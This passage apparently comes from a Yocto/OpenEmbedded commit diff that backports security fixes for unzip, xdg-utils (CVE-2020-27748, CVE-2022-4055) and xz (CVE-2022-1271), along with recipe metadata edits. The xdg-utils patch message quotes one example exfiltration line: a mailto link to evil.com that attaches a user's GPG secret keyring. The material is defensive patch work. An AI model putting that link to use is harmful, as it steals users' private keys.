10 | @@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all) | ||
11 | char buf[9]; | ||
12 | char *buffer = NULL; | ||
13 | char *local_string = NULL; | ||
14 | + size_t buffer_size; | ||
15 | |||
16 | for (wsize = 0; wide_string[wsize]; wsize++) ; | ||
17 | |||
18 | if (max_bytes < MAX_ESCAPE_BYTES) | ||
19 | max_bytes = MAX_ESCAPE_BYTES; | ||
20 | |||
21 | - if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) { | ||
22 | + buffer_size = wsize * max_bytes + 1; | ||
23 | + if ((buffer = (char *)malloc(buffer_size)) == NULL) { | ||
24 | return NULL; | ||
25 | } | ||
26 | |||
27 | @@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all) | ||
28 | /* no MB for this wide */ | ||
29 | /* use escape for wide character */ | ||
30 | char *escape_string = wide_to_escape_string(wide_string[i]); | ||
31 | - strcat(buffer, escape_string); | ||
32 | + size_t buffer_len = strlen(buffer); | ||
33 | + size_t escape_string_len = strlen(escape_string); | ||
34 | + if (buffer_len + escape_string_len + 1 > buffer_size) | ||
35 | + escape_string_len = buffer_size - buffer_len - 1; | ||
36 | + strncat(buffer, escape_string, escape_string_len); | ||
37 | free(escape_string); | ||
38 | } | ||
39 | } | ||
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch new file mode 100644 index 0000000000..363dafddc9 --- /dev/null +++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch | |||
@@ -0,0 +1,33 @@ | |||
1 | https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355 | ||
2 | |||
3 | CVE: CVE-2022-0530 | ||
4 | Upstream-Status: Inactive-Upstream [need a new release] | ||
5 | |||
6 | diff --git a/fileio.c b/fileio.c | ||
7 | index 6290824..77e4b5f 100644 | ||
8 | --- a/fileio.c | ||
9 | +++ b/fileio.c | ||
10 | @@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */ | ||
11 | /* convert UTF-8 to local character set */ | ||
12 | fn = utf8_to_local_string(G.unipath_filename, | ||
13 | G.unicode_escape_all); | ||
14 | + if (fn == NULL) | ||
15 | + return PK_ERR; | ||
16 | + | ||
17 | /* make sure filename is short enough */ | ||
18 | if (strlen(fn) >= FILNAMSIZ) { | ||
19 | fn[FILNAMSIZ - 1] = '\0'; | ||
20 | diff --git a/process.c b/process.c | ||
21 | index d2a846e..715bc0f 100644 | ||
22 | --- a/process.c | ||
23 | +++ b/process.c | ||
24 | @@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all) | ||
25 | int escape_all; | ||
26 | { | ||
27 | zwchar *wide = utf8_to_wide_string(utf8_string); | ||
28 | + if (wide == NULL) | ||
29 | + return NULL; | ||
30 | char *loc = wide_to_local_string(wide, escape_all); | ||
31 | free(wide); | ||
32 | return loc; | ||
33 | |||
diff --git a/meta/recipes-extended/unzip/unzip_6.0.bb b/meta/recipes-extended/unzip/unzip_6.0.bb index c1ea0a9a2c..fa57c8f5bd 100644 --- a/meta/recipes-extended/unzip/unzip_6.0.bb +++ b/meta/recipes-extended/unzip/unzip_6.0.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Utilities for extracting and viewing files in .zip archives" | 1 | SUMMARY = "Utilities for extracting and viewing files in .zip archives" |
2 | HOMEPAGE = "http://www.info-zip.org" | 2 | HOMEPAGE = "http://www.info-zip.org" |
3 | DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc." | ||
3 | SECTION = "console/utils" | 4 | SECTION = "console/utils" |
4 | LICENSE = "BSD-3-Clause" | 5 | LICENSE = "BSD-3-Clause" |
5 | LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29" | 6 | LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29" |
@@ -25,12 +26,18 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/ | |||
25 | file://CVE-2019-13232_p1.patch \ | 26 | file://CVE-2019-13232_p1.patch \ |
26 | file://CVE-2019-13232_p2.patch \ | 27 | file://CVE-2019-13232_p2.patch \ |
27 | file://CVE-2019-13232_p3.patch \ | 28 | file://CVE-2019-13232_p3.patch \ |
29 | file://CVE-2021-4217.patch \ | ||
30 | file://CVE-2022-0529.patch \ | ||
31 | file://CVE-2022-0530.patch \ | ||
28 | " | 32 | " |
29 | UPSTREAM_VERSION_UNKNOWN = "1" | 33 | UPSTREAM_VERSION_UNKNOWN = "1" |
30 | 34 | ||
31 | SRC_URI[md5sum] = "62b490407489521db863b523a7f86375" | 35 | SRC_URI[md5sum] = "62b490407489521db863b523a7f86375" |
32 | SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37" | 36 | SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37" |
33 | 37 | ||
38 | # Patch from https://bugzilla.redhat.com/attachment.cgi?id=293893&action=diff applied to 6.0 source | ||
39 | CVE_CHECK_WHITELIST += "CVE-2008-0888" | ||
40 | |||
34 | # exclude version 5.5.2 which triggers a false positive | 41 | # exclude version 5.5.2 which triggers a false positive |
35 | UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz" | 42 | UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz" |
36 | 43 | ||
diff --git a/meta/recipes-extended/watchdog/watchdog_5.15.bb b/meta/recipes-extended/watchdog/watchdog_5.15.bb index beebb5b004..0adf1fbb41 100644 --- a/meta/recipes-extended/watchdog/watchdog_5.15.bb +++ b/meta/recipes-extended/watchdog/watchdog_5.15.bb | |||
@@ -21,7 +21,6 @@ SRC_URI[sha256sum] = "ffdc865137ad5d8e53664bd22bad4de6ca136d1b4636720320cb52af0c | |||
21 | # Can be dropped when the output next changes, avoids failures after | 21 | # Can be dropped when the output next changes, avoids failures after |
22 | # reproducibility issues | 22 | # reproducibility issues |
23 | PR = "r1" | 23 | PR = "r1" |
24 | HASHEQUIV_HASH_VERSION .= ".1" | ||
25 | 24 | ||
26 | UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/" | 25 | UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/" |
27 | UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/" | 26 | UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/" |
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch | |||
@@ -0,0 +1,58 @@ | |||
1 | From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 | ||
2 | From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> | ||
3 | Date: Tue, 18 Aug 2020 16:52:24 +0100 | ||
4 | Subject: [PATCH] xdg-email: remove attachment handling from mailto | ||
5 | MIME-Version: 1.0 | ||
6 | Content-Type: text/plain; charset=UTF-8 | ||
7 | Content-Transfer-Encoding: 8bit | ||
8 | |||
9 | This allows attacker to extract secrets from users: | ||
10 | |||
11 | mailto:sid@evil.com?attach=/.gnupg/secring.gpg | ||
12 | |||
13 | See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 | ||
14 | and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 | ||
15 | |||
16 | Signed-off-by: Jörg Thalheim <joerg@thalheim.io> | ||
17 | --- | ||
18 | scripts/xdg-email.in | 7 +------ | ||
19 | 1 file changed, 1 insertion(+), 6 deletions(-) | ||
20 | |||
21 | Upstream-Status: Backport | ||
22 | CVE: CVE-2020-27748 | ||
23 | |||
24 | diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in | ||
25 | index 6db58ad..5d2f4f3 100644 | ||
26 | --- a/scripts/xdg-email.in | ||
27 | +++ b/scripts/xdg-email.in | ||
28 | @@ -32,7 +32,7 @@ _USAGE | ||
29 | |||
30 | run_thunderbird() | ||
31 | { | ||
32 | - local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH | ||
33 | + local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY | ||
34 | THUNDERBIRD="$1" | ||
35 | MAILTO=$(echo "$2" | sed 's/^mailto://') | ||
36 | echo "$MAILTO" | grep -qs "^?" | ||
37 | @@ -48,7 +48,6 @@ run_thunderbird() | ||
38 | BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) | ||
39 | SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) | ||
40 | BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) | ||
41 | - ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) | ||
42 | |||
43 | if [ -z "$TO" ] ; then | ||
44 | NEWMAILTO= | ||
45 | @@ -68,10 +67,6 @@ run_thunderbird() | ||
46 | NEWMAILTO="${NEWMAILTO},$BODY" | ||
47 | fi | ||
48 | |||
49 | - if [ -n "$ATTACH" ] ; then | ||
50 | - NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" | ||
51 | - fi | ||
52 | - | ||
53 | NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') | ||
54 | DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" | ||
55 | "$THUNDERBIRD" -compose "$NEWMAILTO" | ||
56 | -- | ||
57 | GitLab | ||
58 | |||
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch new file mode 100644 index 0000000000..383634ad53 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch | |||
@@ -0,0 +1,165 @@ | |||
1 | From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001 | ||
2 | From: Gabriel Corona <gabriel.corona@enst-bretagne.fr> | ||
3 | Date: Thu, 25 Aug 2022 23:51:45 +0200 | ||
4 | Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes | ||
5 | CVE-2020-27748, CVE-2022-4055) | ||
6 | |||
7 | Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780] | ||
8 | CVE: CVE-2022-4055 | ||
9 | Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> | ||
10 | --- | ||
11 | scripts/xdg-email.in | 108 ------------------------------------------- | ||
12 | 1 file changed, 108 deletions(-) | ||
13 | |||
14 | diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in | ||
15 | index 13ba2d5..b700679 100644 | ||
16 | --- a/scripts/xdg-email.in | ||
17 | +++ b/scripts/xdg-email.in | ||
18 | @@ -30,76 +30,8 @@ _USAGE | ||
19 | |||
20 | #@xdg-utils-common@ | ||
21 | |||
22 | -run_thunderbird() | ||
23 | -{ | ||
24 | - local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY | ||
25 | - THUNDERBIRD="$1" | ||
26 | - MAILTO=$(echo "$2" | sed 's/^mailto://') | ||
27 | - echo "$MAILTO" | grep -qs "^?" | ||
28 | - if [ "$?" = "0" ] ; then | ||
29 | - MAILTO=$(echo "$MAILTO" | sed 's/^?//') | ||
30 | - else | ||
31 | - MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/') | ||
32 | - fi | ||
33 | - | ||
34 | - MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g') | ||
35 | - TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) | ||
36 | - CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) | ||
37 | - BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) | ||
38 | - SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) | ||
39 | - BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) | ||
40 | - | ||
41 | - if [ -z "$TO" ] ; then | ||
42 | - NEWMAILTO= | ||
43 | - else | ||
44 | - NEWMAILTO="to='$TO'" | ||
45 | - fi | ||
46 | - if [ -n "$CC" ] ; then | ||
47 | - NEWMAILTO="${NEWMAILTO},cc='$CC'" | ||
48 | - fi | ||
49 | - if [ -n "$BCC" ] ; then | ||
50 | - NEWMAILTO="${NEWMAILTO},bcc='$BCC'" | ||
51 | - fi | ||
52 | - if [ -n "$SUBJECT" ] ; then | ||
53 | - NEWMAILTO="${NEWMAILTO},$SUBJECT" | ||
54 | - fi | ||
55 | - if [ -n "$BODY" ] ; then | ||
56 | - NEWMAILTO="${NEWMAILTO},$BODY" | ||
57 | - fi | ||
58 | - | ||
59 | - NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') | ||
60 | - DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" | ||
61 | - "$THUNDERBIRD" -compose "$NEWMAILTO" | ||
62 | - if [ $? -eq 0 ]; then | ||
63 | - exit_success | ||
64 | - else | ||
65 | - exit_failure_operation_failed | ||
66 | - fi | ||
67 | -} | ||
68 | - | ||
69 | open_kde() | ||
70 | { | ||
71 | - if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then | ||
72 | - local kreadconfig=kreadconfig$KDE_SESSION_VERSION | ||
73 | - else | ||
74 | - local kreadconfig=kreadconfig | ||
75 | - fi | ||
76 | - | ||
77 | - if which $kreadconfig >/dev/null 2>&1; then | ||
78 | - local profile=$($kreadconfig --file emaildefaults \ | ||
79 | - --group Defaults --key Profile) | ||
80 | - if [ -n "$profile" ]; then | ||
81 | - local client=$($kreadconfig --file emaildefaults \ | ||
82 | - --group "PROFILE_$profile" \ | ||
83 | - --key EmailClient \ | ||
84 | - | cut -d ' ' -f 1) | ||
85 | - | ||
86 | - if echo "$client" | grep -Eq 'thunderbird|icedove'; then | ||
87 | - run_thunderbird "$client" "$1" | ||
88 | - fi | ||
89 | - fi | ||
90 | - fi | ||
91 | - | ||
92 | local command | ||
93 | case "$KDE_SESSION_VERSION" in | ||
94 | '') command=kmailservice ;; | ||
95 | @@ -130,15 +62,6 @@ open_kde() | ||
96 | |||
97 | open_gnome3() | ||
98 | { | ||
99 | - local client | ||
100 | - local desktop | ||
101 | - desktop=`xdg-mime query default "x-scheme-handler/mailto"` | ||
102 | - client=`desktop_file_to_binary "$desktop"` | ||
103 | - echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1 | ||
104 | - if [ $? -eq 0 ] ; then | ||
105 | - run_thunderbird "$client" "$1" | ||
106 | - fi | ||
107 | - | ||
108 | if gio help open 2>/dev/null 1>&2; then | ||
109 | DEBUG 1 "Running gio open \"$1\"" | ||
110 | gio open "$1" | ||
111 | @@ -159,13 +82,6 @@ open_gnome3() | ||
112 | |||
113 | open_gnome() | ||
114 | { | ||
115 | - local client | ||
116 | - client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || "" | ||
117 | - echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1 | ||
118 | - if [ $? -eq 0 ] ; then | ||
119 | - run_thunderbird "$client" "$1" | ||
120 | - fi | ||
121 | - | ||
122 | if gio help open 2>/dev/null 1>&2; then | ||
123 | DEBUG 1 "Running gio open \"$1\"" | ||
124 | gio open "$1" | ||
125 | @@ -231,15 +147,6 @@ open_flatpak() | ||
126 | |||
127 | open_generic() | ||
128 | { | ||
129 | - local client | ||
130 | - local desktop | ||
131 | - desktop=`xdg-mime query default "x-scheme-handler/mailto"` | ||
132 | - client=`desktop_file_to_binary "$desktop"` | ||
133 | - echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1 | ||
134 | - if [ $? -eq 0 ] ; then | ||
135 | - run_thunderbird "$client" "$1" | ||
136 | - fi | ||
137 | - | ||
138 | xdg-open "$1" | ||
139 | local ret=$? | ||
140 | |||
141 | @@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do | ||
142 | shift | ||
143 | ;; | ||
144 | |||
145 | - --attach) | ||
146 | - if [ -z "$1" ] ; then | ||
147 | - exit_failure_syntax "file argument missing for --attach option" | ||
148 | - fi | ||
149 | - check_input_file "$1" | ||
150 | - file=`readlink -f "$1"` # Normalize path | ||
151 | - if [ -z "$file" ] || [ ! -f "$file" ] ; then | ||
152 | - exit_failure_file_missing "file '$1' does not exist" | ||
153 | - fi | ||
154 | - | ||
155 | - url_encode "$file" | ||
156 | - options="${options}attach=${result}&" | ||
157 | - shift | ||
158 | - ;; | ||
159 | - | ||
160 | -*) | ||
161 | exit_failure_syntax "unexpected option '$parm'" | ||
162 | ;; | ||
163 | -- | ||
164 | 2.25.1 | ||
165 | |||
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..f6989430f5 100644 --- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb | |||
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" | |||
20 | SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ | 20 | SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ |
21 | file://0001-Reinstate-xdg-terminal.patch \ | 21 | file://0001-Reinstate-xdg-terminal.patch \ |
22 | file://0001-Don-t-build-the-in-script-manual.patch \ | 22 | file://0001-Don-t-build-the-in-script-manual.patch \ |
23 | file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ | ||
24 | file://CVE-2022-4055.patch \ | ||
23 | " | 25 | " |
24 | 26 | ||
25 | SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" | 27 | SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" |
diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb index 6e43f5be6f..765a34e842 100644 --- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb +++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Socket-based service activation daemon" | 1 | SUMMARY = "Socket-based service activation daemon" |
2 | HOMEPAGE = "https://github.com/xinetd-org/xinetd" | 2 | HOMEPAGE = "https://github.com/xinetd-org/xinetd" |
3 | DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things." | ||
3 | 4 | ||
4 | # xinetd is a BSD-like license | 5 | # xinetd is a BSD-like license |
5 | # Apple and Gentoo say BSD here. | 6 | # Apple and Gentoo say BSD here. |
@@ -12,7 +13,7 @@ PR = "r2" | |||
12 | # Blacklist a bogus tag in upstream check | 13 | # Blacklist a bogus tag in upstream check |
13 | UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)" | 14 | UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)" |
14 | 15 | ||
15 | SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \ | 16 | SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \ |
16 | file://xinetd.init \ | 17 | file://xinetd.init \ |
17 | file://xinetd.conf \ | 18 | file://xinetd.conf \ |
18 | file://xinetd.default \ | 19 | file://xinetd.default \ |
diff --git a/meta/recipes-extended/xz/xz/CVE-2022-1271.patch b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch new file mode 100644 index 0000000000..7841a534d3 --- /dev/null +++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch | |||
@@ -0,0 +1,96 @@ | |||
1 | From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001 | ||
2 | From: Lasse Collin <lasse.collin@tukaani.org> | ||
3 | Date: Tue, 29 Mar 2022 19:19:12 +0300 | ||
4 | Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587). | ||
5 | |||
6 | Malicious filenames can make xzgrep to write to arbitrary files | ||
7 | or (with a GNU sed extension) lead to arbitrary code execution. | ||
8 | |||
9 | xzgrep from XZ Utils versions up to and including 5.2.5 are | ||
10 | affected. 5.3.1alpha and 5.3.2alpha are affected as well. | ||
11 | This patch works for all of them. | ||
12 | |||
13 | This bug was inherited from gzip's zgrep. gzip 1.12 includes | ||
14 | a fix for zgrep. | ||
15 | |||
16 | The issue with the old sed script is that with multiple newlines, | ||
17 | the N-command will read the second line of input, then the | ||
18 | s-commands will be skipped because it's not the end of the | ||
19 | file yet, then a new sed cycle starts and the pattern space | ||
20 | is printed and emptied. So only the last line or two get escaped. | ||
21 | |||
22 | One way to fix this would be to read all lines into the pattern | ||
23 | space first. However, the included fix is even simpler: All lines | ||
24 | except the last line get a backslash appended at the end. To ensure | ||
25 | that shell command substitution doesn't eat a possible trailing | ||
26 | newline, a colon is appended to the filename before escaping. | ||
27 | The colon is later used to separate the filename from the grep | ||
28 | output so it is fine to add it here instead of a few lines later. | ||
29 | |||
30 | The old code also wasn't POSIX compliant as it used \n in the | ||
31 | replacement section of the s-command. Using \<newline> is the | ||
32 | POSIX compatible method. | ||
33 | |||
34 | LC_ALL=C was added to the two critical sed commands. POSIX sed | ||
35 | manual recommends it when using sed to manipulate pathnames | ||
36 | because in other locales invalid multibyte sequences might | ||
37 | cause issues with some sed implementations. In case of GNU sed, | ||
38 | these particular sed scripts wouldn't have such problems but some | ||
39 | other scripts could have, see: | ||
40 | |||
41 | info '(sed)Locale Considerations' | ||
42 | |||
43 | This vulnerability was discovered by: | ||
44 | cleemy desu wayo working with Trend Micro Zero Day Initiative | ||
45 | |||
46 | Thanks to Jim Meyering and Paul Eggert discussing the different | ||
47 | ways to fix this and for coordinating the patch release schedule | ||
48 | with gzip. | ||
49 | |||
50 | Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch] | ||
51 | CVE: CVE-2022-1271 | ||
52 | |||
53 | Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org> | ||
54 | --- | ||
55 | src/scripts/xzgrep.in | 20 ++++++++++++-------- | ||
56 | 1 file changed, 12 insertions(+), 8 deletions(-) | ||
57 | |||
58 | diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in | ||
59 | index a1fd19c..da1e65b 100644 | ||
60 | --- a/src/scripts/xzgrep.in | ||
61 | +++ b/src/scripts/xzgrep.in | ||
62 | @@ -178,22 +178,26 @@ for i; do | ||
63 | { test $# -eq 1 || test $no_filename -eq 1; }; then | ||
64 | eval "$grep" | ||
65 | else | ||
66 | + # Append a colon so that the last character will never be a newline | ||
67 | + # which would otherwise get lost in shell command substitution. | ||
68 | + i="$i:" | ||
69 | + | ||
70 | + # Escape & \ | and newlines only if such characters are present | ||
71 | + # (speed optimization). | ||
72 | case $i in | ||
73 | (*' | ||
74 | '* | *'&'* | *'\'* | *'|'*) | ||
75 | - i=$(printf '%s\n' "$i" | | ||
76 | - sed ' | ||
77 | - $!N | ||
78 | - $s/[&\|]/\\&/g | ||
79 | - $s/\n/\\n/g | ||
80 | - ');; | ||
81 | + i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');; | ||
82 | esac | ||
83 | - sed_script="s|^|$i:|" | ||
84 | + | ||
85 | + # $i already ends with a colon so don't add it here. | ||
86 | + sed_script="s|^|$i|" | ||
87 | |||
88 | # Fail if grep or sed fails. | ||
89 | r=$( | ||
90 | exec 4>&1 | ||
91 | - (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&- | ||
92 | + (eval "$grep" 4>&-; echo $? >&4) 3>&- | | ||
93 | + LC_ALL=C sed "$sed_script" >&3 4>&- | ||
94 | ) || r=2 | ||
95 | exit $r | ||
96 | fi >&3 5>&- | ||
diff --git a/meta/recipes-extended/xz/xz_5.2.4.bb b/meta/recipes-extended/xz/xz_5.2.4.bb index 1c4450a9e9..6d80a4f2e9 100644 --- a/meta/recipes-extended/xz/xz_5.2.4.bb +++ b/meta/recipes-extended/xz/xz_5.2.4.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Utilities for managing LZMA compressed files" | 1 | SUMMARY = "Utilities for managing LZMA compressed files" |
2 | HOMEPAGE = "https://tukaani.org/xz/" | 2 | HOMEPAGE = "https://tukaani.org/xz/" |
3 | DESCRIPTION = "XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils." | ||
3 | SECTION = "base" | 4 | SECTION = "base" |
4 | 5 | ||
5 | # The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file | 6 | # The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file |
@@ -22,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \ | |||
22 | file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \ | 23 | file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \ |
23 | " | 24 | " |
24 | 25 | ||
25 | SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz" | 26 | SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \ |
27 | file://CVE-2022-1271.patch \ | ||
28 | " | ||
26 | SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6" | 29 | SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6" |
27 | SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145" | 30 | SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145" |
28 | UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar" | 31 | UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar" |
diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb index 97e5e57533..18b5d8648e 100644 --- a/meta/recipes-extended/zip/zip_3.0.bb +++ b/meta/recipes-extended/zip/zip_3.0.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Compressor/archiver for creating and modifying .zip files" | 1 | SUMMARY = "Compressor/archiver for creating and modifying .zip files" |
2 | HOMEPAGE = "http://www.info-zip.org" | 2 | HOMEPAGE = "http://www.info-zip.org" |
3 | DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc." | ||
3 | SECTION = "console/utils" | 4 | SECTION = "console/utils" |
4 | 5 | ||
5 | LICENSE = "BSD-3-Clause" | 6 | LICENSE = "BSD-3-Clause" |